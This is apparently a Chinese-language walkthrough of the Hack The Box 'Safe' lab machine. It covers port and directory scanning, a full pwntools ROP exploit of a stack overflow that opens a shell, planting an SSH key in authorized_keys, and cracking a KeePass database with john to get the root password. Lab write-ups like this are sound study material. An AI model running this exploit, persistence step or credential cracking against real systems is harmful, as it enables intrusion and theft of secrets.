前言

这是一篇writeup,靶机是来自hackthebox的safe

信息收集

一开始扫全端口,不知道是不是网络问题,怎么都扫不完,后来限制了一下速率:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
kali at ~/htb/safe ❯ nmap -p- --min-rate 10000 -sV -sC -sS 10.10.10.147
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-14 22:27 EST
Nmap scan report for 10.10.10.147
Host is up (7.6s latency).
Not shown: 61065 filtered ports, 4468 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)
| 256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)
|_ 256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

只有22端口和80端口,看来只能从Web入手了,大便系统上搭的apache

为什么没扫出来1337端口

在后续的发现中是还有一个1337端口是开放的,后面看别人的Writeup也有部分Writeup是可以扫出来1337端口的,为啥我这里没有扫出来呢?原因在于应使用-PN参数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
kali at ~/htb/safe ❯ nmap -Pn -p1337 10.10.10.147
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-14 23:01 EST
Nmap scan report for 10.10.10.147
Host is up (0.45s latency).

PORT STATE SERVICE
1337/tcp open waste

Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
kali at ~/htb/safe ❯ nmap -p1337 10.10.10.147
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-14 23:01 EST
Nmap scan report for 10.10.10.147
Host is up (0.00029s latency).

PORT STATE SERVICE
1337/tcp filtered waste

Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

默认下nmap是会先探测主机是否存活,使用-Pn会跳过主机探测的步骤(也就是不Ping)。但是这里有点疑惑的这个IP本身就是可以Ping的,所以理论上跳不跳过主机探测不都是一样的吗?为什么用不用-Pn参数的效果不一样呢?

Web

打开只有一个大便Apache的默认页面:

看到这个页面就觉得应该是要扫一下目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
⇒  python dirsearch.py -u http://10.10.10.147 -e *

_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: CHANGELOG.md | HTTP method: get | Threads: 10 | Wordlist size: 6103

Error Log: /Users/danta/Code/dirsearch/logs/errors-19-12-14_19-09-19.log

Target: http://10.10.10.147

[19:09:20] Starting:
[19:09:33] 403 - 291B - /.hta
[19:09:33] 403 - 300B - /.htaccess.BAK
[19:09:33] 403 - 301B - /.htaccess.bak1
[19:09:33] 403 - 302B - /.htaccess-marco
[19:09:33] 403 - 300B - /.htaccess-dev
[19:09:33] 403 - 302B - /.htaccess-local
[19:09:33] 403 - 298B - /.ht_wsr.txt
[19:09:33] 403 - 300B - /.htaccess.old
[19:09:33] 403 - 301B - /.htaccess.orig
[19:09:33] 403 - 301B - /.htaccess.save
[19:09:33] 403 - 303B - /.htaccess.sample
[19:09:33] 403 - 300B - /.htaccess.txt
[19:09:33] 403 - 299B - /.htaccess_sc
[19:09:33] 403 - 299B - /.htaccessBAK
[19:09:33] 403 - 302B - /.htaccess_extra
[19:09:33] 403 - 301B - /.htaccess_orig
[19:09:34] 403 - 300B - /.htaccessOLD2
[19:09:34] 403 - 295B - /.htgroup
[19:09:34] 403 - 297B - /.htaccess~
[19:09:34] 403 - 299B - /.htaccessOLD
[19:09:34] 403 - 300B - /.htpasswd-old
[19:09:34] 403 - 301B - /.htpasswd_test
[19:09:35] 403 - 297B - /.htpasswds
[19:09:35] 403 - 295B - /.htusers
[19:12:31] 200 - 11KB - /index.html
[19:12:56] 301 - 313B - /manual -> http://10.10.10.147/manual/
[19:12:56] 200 - 626B - /manual/index.html
[19:13:53] 403 - 300B - /server-status
[19:13:53] 403 - 301B - /server-status/

Task Completed

打开/manual看看,发现是apache的文档页面,又是默认页面。后来又换了一些字典,发现还是相同的结果。想来想去也没有别的入口的,后来看看别人的writeup才发现原来还可以这样。。。

查看首页的源码:

里面说还有个1337端口,而且这个程序还可以通过访问路径myapp下载。我是真没想到还可以修改默认页面,看来真是每个细节都不能放过。。

下载myapp后查看是个可执行文件,执行一下看看,然后再看看1337端口

1
2
3
4
5
6
7
8
9
10
11
12
13
kali at ~/htb/safe ❯ file myapp
myapp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fcbd5450d23673e92c8b716200762ca7d282c73a, not stripped
kali at ~/htb/safe ❯ chmod u+x myapp
kali at ~/htb/safe ❯ ./myapp
00:23:04 up 1 day, 23:52, 3 users, load average: 0.00, 0.00, 0.00

What do you want me to echo back? ls
ls
kali at ~/htb/safe ❯ nc 10.10.10.147 1337
00:26:35 up 18:21, 0 users, load average: 0.00, 0.00, 0.00
ls

What do you want me to echo back? ls

到这一步后我有点意外…这不就是一道pwn题吗….

通过栈溢出GetShell

到现在我们知道1337端口的程序就是myapp,就目前所知的是这个程序会输出我们输入的东西。看起来就是一个栈溢出的题目。

使用checksec查看表示开启了NX,但是没有其他的保护了。栈溢出的利用方式大概有4种(手把手教你栈溢出从入门到放弃(上)手把手教你栈溢出从入门到放弃(下))。NX开启了意味着栈上不能执行shellcode,这儿又不知道所用的动态库的版本,没办法用return2libc方法。所以只能用rop的方式。

1
2
3
4
5
6
7
8
9
root@kali:htb/safe # gdb -q myapp
Reading symbols from myapp...
(No debugging symbols found in myapp)
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial

要利用ROP来getshell,我们需要确定两件事:一个是溢出数据的长度,另一个是gadget(某段指令)的地址。

确定溢出长度

gdb装上 Peda 插件,可以很简单即可确定溢出长度。这里需要注意的是,gdb在调试多进程的时候,默认会只调试主进程,而peda是会继续跟踪子进程(相关)。在这个程序中,因为多进程的原因导致程序直接退出了,所以先设置了一下set follow-fork-mode parent来保证peda只调试主进程。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@kali:htb/safe # gdb -q myapp
Reading symbols from myapp...
(No debugging symbols found in myapp)
gdb-peda$ set follow-fork-mode parent
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /root/htb/safe/myapp
[Detaching after vfork from child process 79586]
03:15:51 up 2 days, 2:44, 3 users, load average: 0.00, 0.00, 0.00

What do you want me to echo back? AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7ee0904 (<__GI___libc_write+20>: cmp rax,0xfffffffffffff000)
RDX: 0x7ffff7fb1580 --> 0x0
RSI: 0x405260 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
RDI: 0x0
RBP: 0x41414e4141384141 ('AA8AANAA')
RSP: 0x7fffffffe348 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
RIP: 0x4011ac (<main+77>: ret)
R8 : 0xc9
R9 : 0x0
R10: 0x4003e0 --> 0x6972700073747570 ('puts')
R11: 0x246
R12: 0x401070 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe420 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x4011a1 <main+66>: call 0x401030 <puts@plt>
0x4011a6 <main+71>: mov eax,0x0
0x4011ab <main+76>: leave
=> 0x4011ac <main+77>: ret
0x4011ad: nop DWORD PTR [rax]
0x4011b0 <__libc_csu_init>: push r15
0x4011b2 <__libc_csu_init+2>: mov r15,rdx
0x4011b5 <__libc_csu_init+5>: push r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe348 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0x7fffffffe350 ("AkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0x7fffffffe358 ("AAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0x7fffffffe360 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0032| 0x7fffffffe368 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0040| 0x7fffffffe370 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0048| 0x7fffffffe378 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0056| 0x7fffffffe380 ("AuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004011ac in main ()

可以看到输入了200个长度的字符串后引起了程序的报错(因为程序的返回地址被刚输入的字符串覆盖了,一个错误的地址导致了异常退出,这个错误的地址就是栈顶的值。),这时候我们取到栈顶的值来计算溢出长度。

1
2
3
gdb-peda$ pattern_offset jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 120
gdb-peda$ pattern_create

得到溢出长度120。

选择Gadgets

最终的目的是要获取shell,所以需要执行类似system("/bin/sh")的方法来获得一个shell,因为可以通过栈溢出控制程序执行流程,那么我就还需要两个东西:一个是system函数的地址,一个是”/bin/sh”字符串的地址。

先看一下程序本身有什么函数可以用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x0000000000401000 _init
0x0000000000401030 puts@plt
0x0000000000401040 system@plt
0x0000000000401050 printf@plt
0x0000000000401060 gets@plt
0x0000000000401070 _start
0x00000000004010a0 _dl_relocate_static_pie
0x00000000004010b0 deregister_tm_clones
0x00000000004010e0 register_tm_clones
0x0000000000401120 __do_global_dtors_aux
0x0000000000401150 frame_dummy
0x0000000000401152 test
0x000000000040115f main
0x00000000004011b0 __libc_csu_init
0x0000000000401210 __libc_csu_fini
0x0000000000401214 _fini

systemgets方法,所以可以调用通过gets方法读取/bin/sh,然后通过system调用。

通过使用ida反编译的时候可以看到程序的.data段是可写的,并且获取到地址为0x404038h。所以我们可以通过调用gets函数将/bin/sh写入到0x404038h中,然用调用system(0x404038h)即可。另外我们还需要一个跳转到gets函数的gadgets。

使用ROPgadget可以很方便地找到这个Gadgets:

1
2
root@kali:htb/safe # ROPgadget --binary myapp --only "pop|ret" | grep rdi
0x000000000040120b : pop rdi ; ret

按照这个思路写的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

context(os="linux", arch="amd64")
#context(log_level='DEBUG')

junk = "A"*120

plt_gets = p64(0x401060)
plt_system = p64(0x401040)
pop_rdi = p64(0x40120b)
binsh = p64(0x404038)

payload = junk + pop_rdi + binsh + plt_gets + pop_rdi + binsh + plt_system

p = remote("10.10.10.147", 1337)
p.recvline()
p.sendline(payload)
p.sendline('/bin/sh\x00')
p.interactive()

这里Gadgets并不是唯一的,当可利用的Gadgets很多时,getshell的方法也不止一种,这里国外一个叫大佬写了几种其他的方法:https://0xdf.gitlab.io/2019/10/26/htb-safe.html

1
2
3
4
5
root@kali:htb/safe # python exp1.py
[+] Opening connection to 10.10.10.147 on port 1337: Done
[*] Switching to interactive mode
$ whoami
user

提权

刚刚翻看服务器的时候看到家目录下有几张图片和MyPasswords.kdbx(这个不就是我因为记不住密码用的密码管理器,最后因为记不住密码管理器的密码导致所有密码都丢了的KeePass吗)

1
2
3
4
5
6
7
8
9
10
$ ls
IMG_0545.JPG
IMG_0546.JPG
IMG_0547.JPG
IMG_0548.JPG
IMG_0552.JPG
IMG_0553.JPG
myapp
MyPasswords.kdbx
user.txt

有好几张图片,有个kdbx数据库,这个意思就蛮明显的了吧:kdbx是通过密码+图片来保护的。通过刚刚的方法获得shell之后,因为这台机子还开了22端口,所以可以将自己的公钥复制进来,就可以通过ssh连接了,然后下载文件下来进行爆破。

1
2
root@kali:htb/safe # cat ~/.ssh/id_rsa.pub | base64 -w0
c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FEUmZBbjhSK0FtWWV4RkJUdW1zTDBUekJOTHJCOUs1NG1VT1JBa1l3T3JOcDNrYnhrejBvWHlGckR0cGdWc2pWdDQ4SkFRS0J2UXBCMmlBY3ZoYk5mZjRwVTJhdWZmMkZ4Z....(省略)
1
$ echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FEUmZBbjhSK0FtWWV4RkJUdW1zTDBUekJOTHJCOUs1NG1VT1JBa1l3T3JOcDNrYnhrejBvWHlGckR0cGdWc2pWdDQ4SkFRS0J2UXBCMmlBY3ZoYk5mZjRwVTJhdWZmMkZ4Z....(省略) | base64 -d >> /home/user/.ssh/authorized_keys
1
2
3
4
5
6
7
8
9
root@kali# scp -i ~/id_rsa_generated user@10.10.10.147:~/IMG* .
IMG_0545.JPG 100% 1863KB 944.7KB/s 00:01
IMG_0546.JPG 100% 1872KB 1.6MB/s 00:01
IMG_0547.JPG 100% 2470KB 2.0MB/s 00:01
IMG_0548.JPG 100% 2858KB 1.5MB/s 00:01
IMG_0552.JPG 100% 1099KB 1.6MB/s 00:00
IMG_0553.JPG 100% 1060KB 2.3MB/s 00:00
root@kali# scp -i ~/id_rsa_generated user@10.10.10.147:~/*.kdbx .
MyPasswords.kdbx 100% 2446

使用keepass2john来生成hash文件:

1
2
3
4
5
6
7
8
9
10
root@kali# keepass2john MyPasswords.kdbx > MyPasswords.kdbx.john; for img in $(ls IMG*); do /opt/john/run/keepass2john -k $img MyPasswords.kdbx; done >> MyPasswords.kdbx.john

root@kali# cat MyPasswords.kdbx.john
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*17c3509ccfb3f9bf864fca0bfaa9ab137c7fca4729ceed90907899eb50dd88ae
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*a22ce4289b755aaebc6d4f1b49f2430abb6163e942ecdd10a4575aefe984d162
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*e949722c426b3604b5f2c9c2068c46540a5a2a1c557e66766bab5881f36d93c7
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*d86a22408dcbba156ca37e6883030b1a2699f0da5879c82e422c12e78356390f
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*facad4962e8f4cb2718c1ff290b5026b7a038ec6de739ee8a8a2dd929c376794
MyPasswords:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*7c83badcfe0cd581613699bb4254d3ad06a1a517e2e81c7a7ff4493a5f881cf2

做过几台htb的机子后感觉这里的爆破都用rockyou.txt字典都能跑出来(不过rockyou.txt有点大,先从小的试起),使用john来爆破:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali# john MyPasswords.kdbx.john /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt 
Warning: only loading hashes of type "KeePass", but also saw type "tripcode"
Use the "--format=tripcode" option to force loading hashes of that type instead
Warning: only loading hashes of type "KeePass", but also saw type "descrypt"
Use the "--format=descrypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (KeePass [SHA256 AES 32/64 OpenSSL])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bullshit (MyPasswords)
1g 0:00:01:20 0.47% 2/3 (ETA: 15:46:09) 0.01239g/s 91.21p/s 154.1c/s 154.1C/s emerald..francesco
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

拿到密码后打开密码管理器看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@kali# kpcli --key IMG_0547.JPG --kdb MyPasswords.kdbx
Please provide the master password: *************************

KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
MyPasswords/
kpcli:/> cd MyPasswords/
kpcli:/MyPasswords> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
=== Entries ===
0. Root password
kpcli:/MyPasswords> show -f R
Recycle\ Bin/ Root\ password
kpcli:/MyPasswords> show -f Root\ password

Path: /MyPasswords/
Title: Root password
Uname: root
Pass: u3v2249dl9ptv465cogl3cnpo3fyhk
URL:
Notes:

使用su -命令提权:

1
2
3
4
user@safe:~$ su -
Password:
root@safe:~# cat root.txt
d7af235eb1.....